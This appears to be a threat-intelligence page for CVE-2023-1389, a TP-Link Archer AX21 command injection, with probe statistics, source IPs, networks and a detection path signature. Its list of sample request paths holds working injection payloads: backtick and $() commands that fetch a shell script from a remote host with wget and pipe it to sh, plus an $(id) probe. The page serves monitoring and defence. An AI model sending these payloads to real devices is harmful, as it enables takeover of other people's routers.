CVE report
CVE-2023-1389criticalKEV
TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
Events 90d
62
Distinct IPs
20
Severity
critical
CISA KEV
Actively exploited
Detection signature
An event counts toward CVE-2023-1389 when its URL path contains any of these (case-insensitive). This is what our matching is based on.
- · /cgi-bin/luci/;stok=/locale?form=country
Pre-disclosure activity
all early actors →Analysing probe history around the publication date…
Recent probe volume (last 7 days)
peak: 6 events/dayeventsdistinct IPs
Downloads & integrations
Top sources probing for CVE-2023-1389
- 221.159.119.626 eventsSouth Korea· Korea Telecom
- 85.11.167.166 eventsThe Netherlands· TechTies Inc.
- 124.198.131.1855 eventsUnited States· 1337 Services GmbH
- 142.248.80.314 eventsUnited States· Advin Services LLC
- 94.154.43.1583 eventsUkraine· Amarutu Technology Ltd
- 192.142.28.772 eventsThe Netherlands· Hostpalace Datacenters Ltd
- 31.135.19.2372 eventsPoland· SWIDMAN S.C. Mariusz Bzowski, Dariusz Drelich
- 101.36.125.582 eventsHong Kong· UCLOUD INFORMATION TECHNOLOGY HK LIMITED
- 94.154.43.1151 eventsThe Netherlands· Storm Industries LLC
- 176.65.139.1661 eventsGermany· Pfcloud UG (haftungsbeschrankt)
- 176.65.139.1581 eventsGermany· Pfcloud UG (haftungsbeschrankt)
- 176.65.139.1261 eventsGermany· Pfcloud UG (haftungsbeschrankt)
- 45.153.34.1701 eventsNetherlands· Pfcloud UG (haftungsbeschrankt)
- 94.154.43.301 eventsThe Netherlands· Storm Industries LLC
- 176.65.139.1651 eventsGermany· Pfcloud UG (haftungsbeschrankt)
- 176.65.139.1361 eventsGermany· Pfcloud UG (haftungsbeschrankt)
- 195.178.110.421 eventsBulgaria· Techoff Srv Limited
- 79.137.162.561 eventsRussia· LLC Digital Network
- 45.198.224.1481 eventsSweden
- 94.154.43.101 eventsUkraine· Storm Industries LLC
Top networks the attempts come from
- AS4766 Korea Telecom1 IPs · 26 ev
- AS197170 TechTies Inc.1 IPs · 6 ev
- AS51396 Pfcloud UG (haftungsbeschrankt)6 IPs · 6 ev
- AS210558 1337 Services GmbH1 IPs · 5 ev
- AS22295 Advin Services LLC1 IPs · 4 ev
- AS219502 Storm Industries LLC3 IPs · 3 ev
- AS135377 UCLOUD INFORMATION TECHNOLOGY HK LIMITED1 IPs · 2 ev
- AS56983 SWIDMAN S.C. Mariusz Bzowski, Dariusz Drelich1 IPs · 2 ev
- AS60064 Hostpalace Datacenters Ltd1 IPs · 2 ev
- AS206264 Amarutu Technology Ltd1 IPs · 2 ev
Fingerprints of the clients exploiting this
The HTTP (JA4H) and TLS (JA4) fingerprints seen on these attempts. Click one to see the whole population that carries it.
Sample request paths observed
- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F204.10.194.134%2Frondo.%5Czqq.sh%7Csh%60
- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id)
- /cgi-bin/luci/;stok=/locale?form=country
- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)